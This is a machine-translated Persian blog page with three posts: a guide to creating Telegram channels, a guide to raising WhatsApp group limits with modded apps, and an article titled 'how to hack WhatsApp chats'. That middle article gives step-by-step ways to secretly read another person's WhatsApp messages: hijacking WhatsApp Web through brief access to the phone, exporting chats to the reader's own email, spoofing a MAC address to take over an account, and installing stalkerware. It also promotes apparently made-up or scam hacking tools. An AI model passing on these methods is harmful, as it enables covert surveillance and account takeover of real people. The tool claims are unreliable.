loading...

follower

khodam بازدید : 56 1400/06/02 زمان : 19:15 نظرات (0)

نحوه ایجاد کانال تلگرام جدید و موفقیت در آن

در این مقاله ، ما به طور مفصل در مورد پدیده سریع در حال توسعه کانال های تلگرامی ، نحوه ایجاد ، طراحی ، رفتار ، تبلیغات و تنوع محتوای کانال به شما خواهیم گفت. همچنین خواهید دید که تلگرام چه عملکردهای مفید و جالبی را برای دارندگان و سرپرستان کانال ارائه کرده است. اگر به فکر ایجاد کانال تلگرام خود هستید - این مقاله برای شما مناسب است.

  • کانال تلگرام چیست
    نحوه ایجاد کانال تلگرام
    آیا ارزش ایجاد کانال را دارد
    ایده و تم کانال
    طراحی کانال تلگرام
    کانال ضرب
    چرا به مدیران کانال نیاز دارید
    نحوه اضافه کردن مدیر کانال
    نحوه انتشار محتوا
    ویژگی های استاندارد
    تله پست
    ویژگی های مختلف
    هشتگ ها
    نظرسنجی ها
    مسابقه
    گروه ها
    پین کردن پیام ها
    نحوه تبلیغ کانال ایجاد شده
    کسب درآمد از کانال در تلگرام
    نظارت بر آمار
    کانال تلگرام چیست


کانال تلگرام وبلاگی است که توسط یک یا چند ویرایشگر هدایت می شود. شما یک کانال ایجاد می کنید ، پس از آن می توانید پیام ها را در آنجا ارسال کنید و کاربران تلگرام می توانند در کانال شما مشترک شوند و آنچه را که در آنجا می نویسید بخوانند. کانال های تلگرام شخصی و غیرتجاری هستند ، چه از یک برند و چه از یک شرکت بزرگ. کانال ها به شما امکان می دهند پیام های متنی را برای مخاطبان انبوه پخش کنید.

کانال خبری تلگرام


کانال های تلگرامی می توانند تعداد نامحدودی مشترک داشته باشند ، اما مشترکین یکدیگر را نمی بینند و نمی دانند چه کسانی غیر از آنها در این کانال مشترک شده اند. تعداد کمی از پیام رسان های دیگر چنین عملکردی را ارائه می دهند. کانال های تلگرام می توانند خصوصی و عمومی باشند. کانال های خصوصی تلگرام فقط با دعوت نامه در دسترس هستند. برای دسترسی به یک کانال خصوصی یا حتی اطلاع از وجود آن ، باید یک پیوند دعوت نامه به گروه در جایی پیدا کنید ، یا خود مدیر باید شما را به مشترکان اضافه کند.

برای عضویت در کانال روی دکمه کلیک کنید


کانالهای عمومی تلگرام برای جستجو در دسترس هستند. این بدان معناست که می توانید به برنامه بروید و در یک نوار جستجوی ویژه ، کانالهای مورد نیاز تلگرام در موضوعات مورد علاقه خود را پیدا کنید. کانالهای تلگرامی را جستجو کنید به این ترتیب ، می توانید تعداد کمی کانال پیدا کنید ، زیرا سیستم جستجو در پیام رسان ضعیف توسعه یافته است. بنابراین ، ما مقاله ای را در مورد همه روش های جستجوی کانال در تلگرام توصیه می کنیم.

نحوه ایجاد کانال تلگرام


قابلیت ایجاد کانال تلگرام به همان اندازه در تلگرام در Android ، iOS و نسخه دسکتاپ موجود است: از منوی تلگرام "ایجاد کانال" را انتخاب کنید.


  • نام کانال و توضیحات آن را بنویسید ؛
    نوع کانال را انتخاب کنید: عمومی یا خصوصی ؛
    اولین مشترکین را دعوت کنید ؛
    کانال ایجاد شد!
    در مرحله بعد ، ما در مورد روند ایجاد یک کانال بیشتر توضیح خواهیم داد.

برای ایجاد یک کانال تلگرامی در سیستم عامل iOS ، برگه "Chats" را انتخاب کنید و سپس دکمه پیام را در گوشه سمت راست بالا پیدا کرده و روی عملکرد "New channel" کلیک کنید. نحوه ایجاد یک کانال تلگرام.

ایجاد کانال در تلگرام در iOS


نسخه دسکتاپ تقریباً مشابه نسخه اندروید است. باید روی نماد سه نوار در بالای صفحه کلیک کنید و سپس گزینه "ایجاد کانال" را انتخاب کنید. نامی را انتخاب کنید ، عکس کانال را تنظیم کنید ، توضیحاتی را وارد کنید پس از کلیک بر روی دکمه "ایجاد کانال" ، منویی خواهید داشت که در آن باید نام کانالی را که انتخاب کرده اید وارد کرده ، نماد کانال را تنظیم کرده و توضیحات آن را اضافه کنید. در توضیحات کانال ، راهی برای تماس با شما و ترجیحاً برچسب ها (حداکثر تا 5) بنویسید.

پس از اتمام کار ، روی علامت تیک در گوشه سمت راست بالای صفحه خود کلیک کنید. یک برگه خواهید داشت که در آن شما باید یک کانال عمومی یا خصوصی را که در حال ایجاد یک کانال هستید انتخاب کنید ، و همچنین یک ورود کوتاه برای آن انتخاب کنید.

نوع کانال را انتخاب کنید


پس از انتخاب هر چیزی که نیاز دارید ، روی علامت چک در گوشه سمت راست بالا کلیک کنید. تلگرام به شما پیشنهاد می دهد که از لیست مخاطبین خود حداکثر 200 مشترک به کانال اضافه کنید. در صورت تمایل می توانید اضافه کنید یا روی "رد شدن" این برگه کلیک کنید. کلیک شد؟ کانال جدید شما ایجاد شد! اگر می خواهید کانالی را که ایجاد کرده اید حذف کنید - فقط روی دکمه پایین صفحه "حذف کانال" کلیک کنید. فقط می توانید یک کانال کوچک یا تازه ایجاد شده را حذف کنید. حذف یک کانال قدیمی تلگرام با تعداد زیادی مشترک با یک کلیک غیرممکن است. قبل از ایجاد کانال به چند نکته توجه کنید: طول ورود کانال باید در محدوده 5-32 نویسه باشد. نام نمی تواند بیش از 255 نویسه باشد. بیش از 10 کانال عمومی را نمی توان از یک حساب ایجاد کرد. تعداد مشترکین کانال تلگرام نامحدود است.
مالک کانال می تواند حداکثر 50 مدیر تعیین کند. حداکثر 20 ربات را می توان به کانال متصل کرد. تنها با تماس با پشتیبانی فنی تلگرام می توانید کانالی با بیش از 1 هزار مشترک حذف کنید. آیا ارزش ایجاد کانال را دارد آیا باید کانال تلگرام ایجاد کنم؟ آیا باید کانال تلگرام ایجاد کنم؟ برای خود این سوال را حل کنید "آیا ایجاد کانال تلگرامی ضروری است؟" سعی کنید مشخص کنید که شما به عنوان خالق کانال دقیقاً چه چیزی دریافت خواهید کرد و همچنین مشترکان شما با خواندن این کانال چه چیزی را برای خود دریافت خواهند کرد.

اگر می توانید به این دو س answerال پاسخ دهید و چیزی برای اشتراک گذاری با جهان دارید ، ایجاد کانال تلگرام قطعاً ارزشش را دارد! گاهی اوقات چیزهای کاملاً غیرمنتظره می توانند منبع پر کردن کانال باشند ، به عنوان مثال ، ارسال محتوا ممکن است محصول جانبی شغل اصلی شما ، فعالیتهای خلاقانه شما ، تلاش برای وبلاگ نویسی یا حتی نظرات چت ساده در مورد موضوعات رایگان باشد. اغلب اوقات ، کانال های تلگرامی کمک خوبی برای انجام کسب و کار هستند ، یا خود منبع درآمد شما می شود. هدف از ایجاد کانال به این معنی که اهداف ایجاد یک کانال تلگرامی می تواند بسیار متفاوت باشد ، اما همچنان می توانید آنها را در دسته های زیر گروه بندی کنید: پوشش موضوعات محبوب و / یا مورد تقاضا ، با هدف کسب درآمد بعدی 


تلگرام  شخصی یا شرکتی ؛

یکی از عناصر بسیار مهم در روند ایجاد کانال تلگرام ، انتخاب تیم است. سرعت زندگی مدرن بسیار زیاد است ، بنابراین برای چندین مدیر آسان تر خواهد بود که آن را با محتوا پر کنند. افرادی را پیدا کنید که به موضوع کانال مورد اعتماد خود علاقه دارند و به آنها حق سرپرستی بدهید.

چرا به مدیران کانال نیاز دارید
چرا در کانال تلگرام به مدیر نیاز دارید؟
چرا در کانال تلگرام به مدیر نیاز دارید؟
ایجاد و مدیریت کانال های تلگرام لیست مشکلات خاص خود را دارد ، به ویژه با توجه به تعداد بالقوه نامحدود مشترکین در کانال. مسنجر ابزارها و عملکردهای زیادی ایجاد کرده است که به شما در مدیریت پروژه شما کمک می کند. بیایید اکنون در مورد سازماندهی مدیریت کانال تلگرام صحبت کنیم. دیر یا زود ، برای مدیریت کانال به کمک یاور و سایر ابزارهای مفید برای کار با پروژه نیاز خواهید داشت. تلگرام دارای عملکردی است که به شما امکان می دهد مدیران را اضافه یا حذف کنید ، محدوده حقوق آنها را تعیین کنید ، لیستی از اقدامات اخیر مدیر را مشاهده کرده و آمار پروژه را زیر نظر داشته باشید. افزودن مدیران به کانال تلگرام به شما این امکان را می دهد که کانال خود را به صورت تیمی مدیریت کنید. بسته به محدوده حقوقی که انتخاب می کنید ، سرپرستان می توانند: تلگرام این امکان را به صاحب کانال می دهد که برای هر سرپرست مجموعه ای از مجوزها را که به صورت جداگانه برای او انتخاب شده است ، تنظیم کند.

نحوه اضافه کردن مدیر کانال


برای افزودن سرپرست جدید ، در تنظیمات کانال خود به بخش "اطلاعات" بروید ، سپس برگه "Administrators" را انتخاب کرده و روی "Add administrator" کلیک کنید. برای مدیریت مجوزهای سرپرست ، به بخش "اطلاعات" ، سپس به "مدیران" بروید و روی نام "مدیر" که می خواهید مجوزها را برای آن پیکربندی کنید ، کلیک کنید. پیام های موجود در کانال تلگرامی را می توان بدون ذکر نویسندگی یک مدیر خاص منتشر کرد. علاوه بر این ، می توانید به مدیران اجازه دهید پیامهایی را که با نام خود ارسال می کنند امضا کنند ، و بر تألیف متفاوت محتوا تأکید دارند

نحوه انتشار محتوا


چندین روش مساوی برای انتشار محتوا وجود دارد که انتخاب آنها بر اساس سلیقه خود ، آگاهی از عملکرد و میزان محتوا آسان تر است.قاعده کلی در اینجا این است: سعی کنید آرایه های همگن خاکستری متن را منتشر نکنید ، سعی کنید فعال باشید ، اما از نشانه گذاری ، فونت های مختلف در تلگرام ، شکلک ها و شکلک های مناسب ، هشتگ ها ، در صورت لزوم ، نظرسنجی استفاده کنید. ویژگی های استاندارد بیایید با این واقعیت شروع کنیم که می توانید پستها را در تلگرام دقیقاً به همان روشی که معمولاً در چت خصوصی یا گروهی ارسال می کنید ، منتشر کنید. فقط متن خود را در کادر ورودی وارد کرده و پیام خود را ارسال کنید. با فشردن طولانی نماد ارسال پیام (هواپیما) ، می توانید با منوی پیام به تعویق افتاده تماس بگیرید و زمان ارسال پست به تعویق افتاده را انتخاب کنید. نحوه ایجاد تأخیر در تلگرام در این حالت ، می توانید فایلها ، عکسها را ضمیمه کنید یا با کلیک بر روی نماد "گیره کاغذ" ، یک پیام نظرسنجی را به پیام پیوست کنید. همچنین می توانید شکلک ها را با استفاده از برگه شکلک ها به پیام اضافه کنید ، پیوندها را در متن وارد کرده و متن را قالب بندی کنید ، قطعات مورد نیاز خود را با فونت های خاص برجسته کنید. فرم تایپ پیام کانال و دکمه های مهم نمونه ای از قالب بندی متن علاوه بر این ، تعداد زیادی ربات مختلف در تلگرام وجود دارد که استفاده از آنها می تواند زندگی هر مدیر را به طور جدی آسان کند. در صورت تمایل ، می توانید اکثر این ربات ها را با استفاده از جستجوی تلگرام پیدا کنید ، با این حال ، ما در حال حاضر چندین مورد از معروف ترین و محبوب ترین ربات ها را به شما خواهیم گفت: تله پست
Telepost یک سرویس رایگان مستقل است که برای سهولت زندگی مدیران کانال تلگرام طراحی شده است. با کمک Telepost ، می توانید پست هایی را برای انتشار به تعویق بیاندازید ، از ویرایشگر بصری استفاده کنید:

ویژگی های مختلف تلگرام 


تلگرام دارای تعدادی ویژگی و راهکارهای اضافی بسیار مفید برای تنوع بخشیدن به محتوا است. به عنوان مثال ، در روند پر کردن یک کانال ، می توانید از هشتگ ها ، نظرسنجی ها ، آزمونها ، ایجاد گروه های مرتبط با کانال و همچنین پین پیام های مهم استفاده کنید. ما در مورد بیشتر این تراشه ها جداگانه بیشتر صحبت خواهیم کرد.هشتگ یک کلمه کلیدی کمکی یا چند کلمه ای است که قبل از آن یک #hash وجود دارد. هنگام جستجوی مطالب از هشتگ در شبکه های اجتماعی و وبلاگ ها استفاده کنید. دوروف از هشتگ ها در کانال خود استفاده می کند
دوروف از هشتگ ها در کانال خود استفاده می کند مزیت اصلی این ابزار کمک به ساختار مطالب در کانال تلگرام است. و بیهوده است که بسیاری مفید بودن هشتگ ها را دست کم می گیرند ، زیرا حتی تیم تلگرام و پاول دوروف به طور فعال از آنها در پیام های خود استفاده می کنند. هشتگ ها نه تنها هنگام جستجو در یک کانال خاص ، بلکه هنگام جستجو در تمام کانال ها و چت هایی که مشترک آنها هستید نیز مفید هستند. استفاده از هشتگ ها تنها با تخیل شما محدود می شود - شما می توانید هر تعداد که می خواهید به آنها برسید.
شما می توانید نظرسنجی را نه تنها در کانالها بلکه در گروهها و چتها ایجاد کنید. برای ایجاد یک نظرسنجی در کانال خود ، فقط باید روی نماد "گیره کاغذ" در قسمت ورودی پیام کلیک کنید ، و سپس گزینه "نظرسنجی" را در نوار پایین منو انتخاب کنید. سپس عبارت سوال خود را وارد کنید ، گزینه های پاسخ را در خطوط جداگانه یادداشت کنید و با انتخاب دسته بندی ، تنظیمات مربوط به خود نظرسنجی را تنظیم کنید.

نظرسنجی می تواند عمومی یا ناشناس ، با یک پاسخ یا چند پاسخ باشد. اگر گزینه رای گیری آزاد را انتخاب کنید ، خواهید دید که کدام یک از کسانی که به کدام گزینه رای داده اند رای خود را داده اند. همچنین ، نظرسنجی در کانال ها می تواند با استفاده از ربات های مخصوص تلگرام انجام شود. به عنوان مثال ،vote یک ابزار مفید برای ایجاد نظرسنجی است. با این ربات یک نظرسنجی ایجاد کنید ، گزینه های پاسخ را اضافه کنید و منتشر کنید. همین مورد ، فقط با قابلیت های پیشرفته تر ، توسطQuanBot پیشنهاد می شود. همانطور که قبلاً نوشتیم ، نسخه به روز شده نظرسنجی ها شامل توانایی ایجاد آزمون است. در مسابقه ، شما فقط باید یک پاسخ صحیح را انتخاب کنید ، همه پاسخ های دیگر در مسابقه نادرست هستند. برای ایجاد یک مسابقه با سوالات متعدد و چند رسانه ای ، باید از quizbot @استفاده کنید.

گروه ها تلگرام


وقتی چت تلگرام خود را با کانال خود مرتبط می کنید ، همه پیامهایی که در کانال تلگرام خود منتشر می کنید به طور خودکار در چت ارسال می شوند. این بدان معناست که شما می توانید یک کانال عمومی تلگرام داشته باشید که در آن به روزرسانی ها را برای هرکسی که مایل به خواندن آنها است پخش می کنید. و می توانید یک گروه خصوصی (چت) را به کانال پیوند دهید ، جایی که می توانید مجرب ترین و درگیرترین خوانندگان را که می خواهند بازخورد واقعی دریافت کنند دعوت کنید.

وقتی به دنبال تعامل با مخاطبان خود هستید ، باید به طور فعال از چت های تلگرام استفاده کنید. چت ها نه تنها به شما امکان می دهند نظرسنجی کنید ، بلکه مستقیماً از مخاطبان خود می پرسید که نظرشان در مورد محتوای شما چیست. به هر حال ، چت های تلگرام در واقع تفکر گروهی هستند. آنها به شما امکان می دهند ایده ها را زنده کنید. مخاطبان به شما بازخورد می دهند و شاید حتی ایده شما را به چیزی تبدیل کنند که در ابتدا به آن فکر نمی کردید.

khodam بازدید : 45 1400/05/20 زمان : 19:16 نظرات (0)

نحوه هک چت های WhatsApp

Download Whatsapp Plus APK Latest Version v6.76 Crack 2016
اگر با این مقاله برخورد کرده اید ، احتمالاً باید پیام های شخصی را در WhatsApp بخوانید یا فایل های رسانه ای مشترک را مشاهده کنید. در این مقاله ، بهترین 7 روش هک چت های WhatsApp را خواهید یافت. من به شما توصیه می کنم که همه آنها را بررسی کرده و یکی را انتخاب کنید که با مهارت های فنی و نیازهای نظارت شما مطابقت دارد.

سلب مسئولیت: این مقاله برای استفاده در نظر گرفته شده است و باید فقط برای اهداف اطلاعاتی استفاده شود.
1. با همگام سازی نسخه وب با دستگاه از طریق کد QR ، WhatsApp را هک کنید.
اصلی ترین آسیب پذیری WhatsApp نسخه وب سرویس است که با نام WhatsApp Web شناخته می شود. برای دسترسی به حساب مورد نظر ، تنها کاری که باید انجام دهید این است که آنالوگ WhatsApp را در مرورگر وب به طور دقیق پیکربندی کنید و بعلاوه ، از داده های گرفته شده برای اهداف خود استفاده کنید. تنها نقطه ضعف این روش هک نیاز به دسترسی فیزیکی به تلفن هوشمند موردنظر است. با این حال ، فقط برای یک لحظه ضروری است.

برای هک WhatsApp ، موارد زیر را انجام دهید:

1. تصمیم بگیرید که چگونه می خواهید چت های مورد نظر را بخوانید: از رایانه یا تلفن هوشمند خود.

2. اگر می خواهید از پیام های رومیزی خود به پیام ها دسترسی پیدا کنید ، کافی است نسخه وب وب سایت را باز کرده و گزینه "مرا در سیستم نگه دارید" را فعال کنید.

تصویر
3. اگر می خواهید چت های WhatsApp را در تلفن هوشمند خود مشاهده کنید: یک برنامه ویژه بر روی تلفن هوشمند خود نصب کنید که به شما امکان می دهد نسخه وب را راه اندازی کنید. به Play Market بروید ، "WhatsWeb" را در جستجو وارد کنید ، برنامه را پیدا کنید و آن را نصب کنید.

4. چالش برانگیزترین مرحله. دسترسی به دستگاه مورد نظر اگر دستگاه از رمز عبور محافظت کند ، این کار بسیار دشوار خواهد بود :)

هشدار! دستگاه مورد نظر باید آنلاین باشد در غیر این صورت شما نمی توانید پیام رسان را هک کرده و چت های WhatsApp را بخوانید.

5. پس از دسترسی به تلفن هوشمند موردنظر ، به WhatsApp> Menu> WhatsApp Web بروید. اکنون از دستگاه مورد نظر برای اسکن کد QR از WhatsApp Web در دستگاه خود استفاده کنید. لطفاً توجه داشته باشید که به دلایل حفظ حریم خصوصی ، داده های کد QR یک بار در دقیقه تغییر می کند ، بنابراین باید کد را در این بازه زمانی اسکن کنید.

در نتیجه ، به همه چت ها ، سابقه گفتگو و مخاطبین نمایه هک شده WhatsApp دسترسی خواهید داشت. مزایای این روش هک WhatsApp شامل این واقعیت است که صاحب نمایه هرگز حدس نمی زند که آنها ردیابی شده اند. اما توجه داشته باشید که اگر هدف به منوی WhatsApp Web در برنامه برود ، متوجه می شوند که نسخه رایانه شخصی نیز باز شده است. به هر حال ، هدف احتمالاً حدس نمی زند که چت ها توسط یک فرد غریبه نظارت می شود.

2. با ارسال سابقه چت به ایمیل خود ، از پیام های WhatsApp جاسوسی کنید.
این روش مشابه روش اول است و برای شما مناسب است در صورتی که کمتر از یک دقیقه فرصت داشته باشید به طور مخفیانه به دستگاه مورد نظر دسترسی پیدا کنید. فقط نیم دقیقه زمان برای هک WhatsApp لازم است ، اما به شما این امکان را می دهد که فقط چت را که توسط هدف حذف نشده است بخوانید. در این حالت نظارت آنلاین بر چت ها غیرممکن است.

1. WhatsApp را در دستگاه مورد نظر اجرا کرده و گپ مورد نظر خود را باز کنید.

2. نماد منو را در گوشه سمت چپ بالای چت پیدا خواهید کرد. روی بیشتر> صادر کردن گپ ضربه بزنید.

تصویر

WhatsApp Sender Pro Crack 6.3 Full Version Free Download 2021
3. سپس صادرات چت با یا بدون رسانه را انتخاب کنید.

4. Gmail را انتخاب کنید ، آدرس ایمیل خود را وارد کرده و روی "Export" ضربه بزنید.

اگر گپ با فایلهای رسانه ای را انتخاب کرده اید ، همه عکسها ، فیلمها و فایلهای صوتی به ایمیل وصل می شوند و متون چتها در قالب txt بارگذاری می شوند.

تصویر


3. WhatsApp را با POCWAPP هک کنید
PullOutCorrWhatsApp (همچنین به عنوان POCWAPP یا POC WhatsApp شناخته می شود) توسط هکر چینی "liuhong01" توسعه داده شد. با استفاده از این برنامه ، Whatsapp می تواند از راه دور هک شود و مجرم سایبری می تواند چندین حساب را به طور همزمان هک کند. در حال حاضر ، این برنامه فقط با Android سازگار است. این برنامه پولی است و در DarkNet یافت می شود ، از آنجا که داده ها خصوصی هستند ، هزینه مشخص نیست.

نحوه عملکرد برنامه: کاربر را با شماره تلفن شناسایی می کند و با دور زدن دستگاه و ذخیره سازی ابری ، شماره شناسه وی را در سرور پیدا می کند. این اندازه کل سابقه چت (با همه فایل های رسانه ای) را بدون محتویات تماس های صوتی تجزیه و تحلیل می کند.

علاوه بر این ، برنامه داده ها را در سرور موقت خود بارگذاری کرده و آنها را رمزگشایی می کند. پس از بارگذاری ، سابقه چت هر کاربر برای ذخیره در تلفن هوشمند شما در دسترس است. صاحب دستگاه نمی داند که کپی سابقه چت آنها از سرور نشت کرده است و همچنان از پیام رسان استفاده می کند.

POCWAPP می تواند حداکثر 15 کاربر را در 1 اتصال به سرورها پردازش کند. برای هک WhatsApp با این برنامه ، داشتن یک اتصال اینترنتی خوب الزامی است.

4. بر چت های WhatsApp مورد نظر با WSP 3.0 - WhatsApp Scan Pro نظارت کنید
هک WhatsApp از راه دور بدون دسترسی به دستگاه نیز با WhatsApp Scan Pro امکان پذیر است. سازنده WSP با پیوند یک ویروس فایل مخفی در عکس ایجاد می کند. مطلوب است که از عکس مورد نظر استفاده کنید تا آنها علاقه مند شوند و فایل را باز کنند.

مجرم عکس را از طریق واتساپ برای قربانی ارسال می کند> فایل ویروس در دستگاه مورد نظر باز می شود> WSP در پشتی را در پس زمینه مسدود می کند ، به سازنده متصل می شود و شروع به دریافت کدهای QR می کند که در پیام رسان قربانی اسکن می شود.

این کدهای QR هر 10 ثانیه به روز می شوند و سرور (سازنده) بر روند اسکن نظارت می کند. پس از اتصال به دستگاه قربانی ، هکر جلسه هدف را از راه دور فاش می کند. طبق معمول ، اتصال خوب به اینترنت ضروری است

5. WhatsApp را با بلوتوث پیگیری کنید


به لطف فناوری های "آبی" ، هنگامی که به دستگاه مورد نظر (5-50 متر) نزدیک هستید ، می توانید به راحتی به WhatsApp خود دسترسی پیدا کنید. در این حالت ، داده ها با فرکانس غیرقابل دستیابی منتقل می شوند ، به استثنای هرگونه "اثر انگشت" هک. برنامه های زیادی وجود دارد که می توانند امنیت تلفن های هوشمند را از طریق بلوتوث فعال دور بزنند ، اما هیچ کدام نمی توانند دستگاه را از نام توسعه دهنده اجرا کنند. قدرتمندترین راه حل در اینجا WhatsApp است - BlueMesCrack 2.0. قیمت 300-400 دلار در سال است اما برنامه ارزش امتحان کردن را دارد.

فرآیند هک شامل 5 مرحله است: تشخیص ، اسکن ، آزمایش آسیب پذیری ، هک و انتقال داده.

6. هک WhatsApp بدون دسترسی به تلفن با استفاده از روش جعل
برای هک کردن WhatsApp با استفاده از این روش ، باید به دستگاه مورد نظر دسترسی پیدا کرده و داده های لازم را پیدا کنید.

اول از همه ، پیام رسان WhatsApp را از دستگاه خود حذف کنید. در مرحله بعد ، از راهنما برای پیدا کردن آدرس تلفن هوشمند موردنظر استفاده کنید:

برای هک کردن تلفن هوشمند Android ، تنظیمات> درباره تلفن> وضعیت> آدرس MAC Wi-Fi را باز کنید ؛
برای دسترسی به WhatsApp در iPhone ، تنظیمات> عمومی> درباره> آدرس Wi-Fi را باز کنید.
سپس باید Busy Box و Terminal Emulator را بر روی تلفن هوشمند خود نصب کرده و با کمک این برنامه ها ، آدرس MAC Wi-Fi دستگاه خود را به آدرس دستگاه مورد نظر تغییر دهید. پس از آن ، WhatsApp را نصب کرده و شماره تلفن دستگاه مورد نظر را وارد کنید. کد تأیید را در دستگاه مورد نظر دریافت کرده و سپس آن را حذف کنید. در نهایت ، به سادگی با کد تأیید به حساب WhatsApp مورد نظر وارد شوید.

7. از برنامه WhatsApp Spy استفاده کنید


این ساده ترین راه برای هک چت ها و پیام های WhatsApp است ، زیرا نیازی به تنظیم خود هیچ تنظیماتی ندارید - یک برنامه ردیابی همه چیز را برای شما انجام می دهد. برنامه های جاسوسی واتس اپ مدرن می توانند به راحتی پیام های WhatsApp ، رسانه های مشترک ، مخاطبین و تماس های صوتی را ردیابی کرده و داده های ضبط شده را به حساب آنلاین شما ارسال کنند ، به این معنی که شما می توانید از هر دستگاهی پیام های شخصی را از راه دور رصد کنید.

علاوه بر این ، برنامه های جاسوسی معمولاً برخی ویژگی های اضافی مانند گوش دادن به محیط زنده ، ضبط صفحه ، کنترل دوربین ، صفحه کلید ، عکس از صفحه ، ضبط چت در برنامه های دیگر مانند Line ، Viber ، Tinder ، Facebook ، Snapchat ، Instagram و موارد دیگر را ارائه می دهند.

برنامه های جاسوسی WhatsApp هم برای iOS و هم برای اندروید مناسب هستند و در منابع باز در دسترس هستند. اما توجه داشته باشید که برخی از برنامه های ردیابی نیاز به روت کردن/جیلبریک کردن گوشی هوشمند هدف دارند. یکی از معدود راه حل هایی که نیازی به روت ندارد و نصب آن آسان است EvaSpy است. این برنامه برای پیگیری و بررسی پیام های واتساپ و بررسی فایل های ضمیمه مناسب است.

امیدوارم این مقاله مفید بوده باشد. اگر روشهای دیگر هک WhatsApp را می شناسید ، تجربه خود را در نظرات زیر به اشتراک بگذارید.

با برخی از ایده های ارائه شده در این مقاله موافق یا مخالف هستید؟ نظرات خود را در مورد Digg به ما اطلاع دهید.

به دنبال مقالات بیشتر در WhatsApp هستید؟ در خبرنامه ما در پاورقی زیر مشترک شوید!

khodam بازدید : 47 1400/04/24 زمان : 19:10 نظرات (0)

محدود کردن گروه WhatsApp تا 10k

College girls WhatsApp group link

اگر مدیر یک گروه خاص WhatsApp هستید ، به طور پیش فرض شما اجازه اضافه کردن یا حذف شخصی از گروه WhatsApp را دارید. برای یک پست ویروسی ، بهتر است افراد زیادی در یک گروه WhatsApp باشند.فقط تعداد مشخصی از افراد می توانند به گروه WhatsApp اضافه شوند.☛ بیایید این برنامه های Mod را بررسی کنیم که می توانند حد گروه WhatsApp را به بیش از 256 نفر افزایش دهند.برای افزودن اعضای بیشتر در گروه WhatsApp ، باید افراد بیشتری را با پیوند دعوت گروه دعوت کنید. اما ، با کمک کاوشگر ، می توانید 3000 تا 10،000 نفر را به گروه WhatsApp خود اضافه کنید.

 
آخرین گروه WhatsApp Limit 2021:
 WhatsApp Takes on Zoom With Increased Group Call Limit for iPhone Users:  How to Use it | Technology News


چرا این محدود به 256 کاربر در یک گروه WhatsApp است؟دلیل واقعی آن مشخص نیست اما این تصمیم WhatsApp است و این شرکت در تلاش است روز به روز این محدودیت را افزایش دهد. دلایل آن در جزئیات زیر شرح داده شده است:محدود کردن چت ها:محدود کردن افراد بدون شک استفاده آنها در گروه WhatsApp را به طور خودکار محدود می کند. فرض کنید ، اگر تعداد نامحدودی از افراد در یک گروه WhatsApp اضافه شوند ، ممکن است کاربران هنگام مشاهده همه چت ها با مشکل روبرو شوند. برای دیدن همه گپ ها دشوار است که همیشه به سمت بالا بروید ، بنابراین علاقه به آن گروه خاص را از دست می دهید.

اعضای گروه را اولویت بندی می کند: 
اگر اعضا در یک گروه جدی WhatsApp محدود شوند ، افراد مرتبط اولین انتخاب برای مدیران خواهند بود ، بنابراین این گروه از همه لحاظ ارزشمند است.

شماره داخلی: 
ممکن است مسئله داخلی WhatsApp وجود داشته باشد که مدیران را محدود می کند تا بیش از حد مجاز در یک گروه WhatsApp اضافه کنند. WhatsApp سیستم خود را بهبود می بخشد و محدودیت را افزایش می دهد و ما می توانیم انتظار افزایش در عضو گروه را داشته باشیم.

 
1. حداکثر 3000 عضو در یک گروه WhatsApp  اضافه کنید

بیش از 256 نفر در یک گروه واتس اپ افسانه ای هستند. با به اشتراک گذاشتن لینک دعوت می توانید افراد بیشتری را به گروه WhatsApp اضافه کنید. این بدان معناست که شما نمی توانید بیش از 256 مورد را شامل کنید اما این حد دقیق گروه نیست. بنابراین ، اگر می خواهید حد خود را از 256 به 3000 افزایش دهید ، در آن مرحله این استراتژی برای شما مفید خواهد بود.
 
 پیوند دعوت گروه مشترک برای انجام این کار فقط مراحل ساده را دنبال کنید:

مرحله ی 1:

Increase WhatsApp Group Members Limit from 256 to 10,000 or More
فقط گروه WhatsApp خود را باز کنید و روی نماد سه نقطه ضربه بزنید.

مرحله 2:
بعد ، از آن نقطه روی «اطلاعات گروه» ضربه بزنید و گزینه «دعوت به گروه از طریق پیوند» وجود دارد.

مرحله 3:
فقط ، پیوند را با دوستان خود و در گروه های دیگر به اشتراک بگذارید.

حالا ، وقتی کسی روی آن پیوند ضربه بزند ، او می تواند به گروه بپیوندد حتی اگر این حد از 256 عبور کند ، در نتیجه حداکثر 3000 نفر در یک گروه واتس اپ افزایش می یابد.

2. WhatsApp Plus Mod را برای Group Limit نصب کنید
اگر مدتها در فکر افزایش محدودیت گروه WhatsApp هستید ، WhatsApp Plus بهترین انتخابی است که می توانید روی دستگاه Android یا iOS خود نصب کنید تا محدودیت گروه WhatsApp را بشکنید.

WhatsApp Plus در واقع Mod WhatsApp است ، شما می توانید بیش از 256 نفر را در یک گروه WhatsApp اضافه کنید و این برنامه در قالب APK موجود است که باید آن را در apk بارگیری کنید و آن را در تلفن همراه Android خود نصب کنید.

فقط مراحل ساده را دنبال کنید:

1. فقط WhatsApp plus را در APK بارگیری کنید و آن را بر روی تلفن همراه خود نصب کنید

2. حالا فقط یک گروه در WhatsApp Plus خود ایجاد کنید و افراد بیشتری را که می خواهید اضافه کنید. توجه داشته باشید که در این برنامه برای افزودن بیش از 256 نفر در یک گروه محدودیتی ندارید.

Do you want to bypass or increase WhatsApp group limit 256 members? Learn  how to | Whatsapp group, Root device, Instant messaging

3. محدودیت گروه WhatsApp را با استفاده از ES-Explorer افزایش دهید

برای اضافه کردن بیش از 10،000 نفر در یک گروه WhatsApp ، ES-Explorer بهترین برنامه ای است که باید امتحان کنید. اما ، دستگاه شما باید ریشه در استفاده از ES-Explorer داشته باشد. اکنون ، پس از نصب مدیر فایل ES-Explorer از فروشگاه Play ، فقط روشهای ساده زیر را دنبال کنید.

قبل از شروع ، فقط بررسی کنید که آیا Root Explorer روشن است یا خیر و سپس مراحل بعدی را دنبال کنید -

مرحله 1:
